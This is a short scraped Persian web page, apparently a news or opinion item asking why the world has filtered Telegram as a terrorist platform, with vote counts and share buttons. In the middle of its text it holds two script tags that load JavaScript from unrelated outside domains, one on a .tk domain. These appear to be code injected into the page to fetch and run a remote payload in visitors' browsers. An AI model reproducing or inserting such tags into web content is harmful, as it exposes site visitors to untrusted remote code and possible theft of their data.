چرا دنیا تلگرام را به عنوان پلت فرم تروریست ها فیلتر کرده است؟!


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>همه جای دنیا این رو قبول دارن بجز مردم ایران...........<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
31

- 
13

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر
نظرات
(برای مشاهده نظرات کلیک کنید)